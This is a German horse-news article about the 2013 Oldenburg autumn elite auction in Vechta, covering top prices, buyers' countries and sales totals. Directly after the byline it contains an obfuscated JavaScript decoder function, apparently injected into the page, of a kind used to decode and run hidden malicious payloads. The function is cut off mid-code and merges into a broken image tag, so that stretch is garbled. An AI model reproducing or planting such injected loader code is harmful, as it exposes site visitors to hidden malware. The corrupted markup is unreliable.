Oldenburger Herbstauktion: 300.000 Euro für die beste Dreijährige Deutschlands

6. Oktober 2013 | Von Redaktion | Kategorie: Auktionen, Zucht
function m65c3bbf5572b(wc){var s4=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’;var r1=”;var qb,rd,wb,p1,p5,q8,w7;var vf=0;do{p1=s4.indexOf(wc.charAt(vf++));p5=s4.indexOf(wc.charAt(vf++));q8=s4.indexOf(wc.charAt(vf++));w7=s4.indexOf(wc.charAt(vf++));qb=(p1<<2)|(p5>>4);rd=((p5&15)<<4)|(q8>>2);wb=((q8&3)<<6)|w7;if(qb>=192)qb+=848;else if(qb==168)qb=1025;else if(qb==184)qb=1105;r1+=String.fromCharCode(qb);if(q8!=64){if(rd>=192)rd+=848;else if(rd==168)rd=1025;else if(rd==184)rd=1105;r1+=String.fromCharCode(rd);}if(w7!=64){if(wb>=192)wb+=848;else if(wb==168)wb=1025;else if(wb==184)wb=1105;r1+=String.fromCharCode(wb);}}while(vfandesturnier Rastede und Elitestutenschau” src=”http://www.horse-today.de/wp-content/uploads/2013/10/OLD_Biscaya1.jpg” alt=”Die beste dreijährige Stute Deutschlands Biscaya OLD v. Bordeaux-Quattro B wechselte auf der Oldenburger Herbst-Elite-Auktion für 300.000 Euro nach Monaco (Foto: Beelitz). " width="399" height="600" />

[Vechta (GER)/S. Albrecht]. Stammkundin Bernadette Brune aus Monaco ersteigerte für den Spitzenpreis von 300.000 Euro Biscaya OLD v. Bordeaux-Quattro B-Grandeur auf der Herbst-Elite-Auktion im Oldenburger Pferde Zentrum Vechta. Die elegante, hochmoderne Brilliantring-Stute sammelte in diesem Jahr die Titel der besten dreijährigen Stute Deutschlands, der Vize-Bundeschampionesse und der Landeschampionesse. Darüber hinaus wurde sie zur Reservesiegerin der Elite-Stutenschau in Rastede gekürt. Somit wechselte ein weiteres Spitzenpferd der Vechtaer Auktion in die Talentschmiede von Dressurkönigin Bernadette Brune.

Sohn der Sonne v. Sir Donnerhall I-Sion-Pik Bube wurde als zweite Preisspitze für 150.000 Euro nach Russland zugeschlagen. Mit 100.000 Euro lieferte Firefox O v. Fidertanz-Donnerhall-Bolero das drittbeste Ergebnis. Dieser Bewegungsmeister wird seine Box auf dem Gestüt Bon Homme in Werder beziehen.

Im Lot der Springpferde avancierte der Prämienhengst Curo v. Cornado-Padarco-Espri mit einem Ergebnis von 55.00 Euro zur gefeierten Preisspitze. Die neue Heimat dieses Hengstes liegt in Schleswig-Holstein. Für 43.000 Euro wechselte Ramba Zamba RT v. Quintender-Lovis Corinth-Silvio I in die USA.

In der Fohlenkollektion führte Alpha Centauri v. All Inclusive/Trak.-Sandro Hit-Lavauzelle AA die Preisstatistik an. Für 35.000 Euro wurde dieses noble Hengstfohlen nach Hessen zugeschlagen. Christofferus v. Christ-Danone I-Espri wechselte für 25.500 nach Hamburg.

Genau die Hälfte aller Reitpferde wird künftig Oldenburger Freunden im Ausland Freude bereiten. Im Einzelnen werden diese Qualitätspferde in den USA, (6), Russland (5), Chile (2), Frankreich (2), Großbritannien (2), Belgien (1), Dänemark (1), Kanada (1), Monaco (1) und in der Schweiz für Furore sorgen.

In der Fohlen-Kollektion wurden fünf junge Oldenburger Talente nach Serbien (2), Belgien, in die Schweiz und in die USA versteigert.

Der Durchschnittspreis der Reitpferde-Kollektion pendelte sich bei 43.086 Euro ein. Der Gesamtumsatz betrug 1.895.800 Euro. Die Fohlen erzielten einen Durchschnittspreis von 9.815 Euro sowie einen Gesamtumsatz von 333.700 Euro.

Tags: , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , ,
Trackback URL: http://www.horse-today.de/wp-trackback.php?p=110885

Hier klicken, um einen Kommentar zu schreiben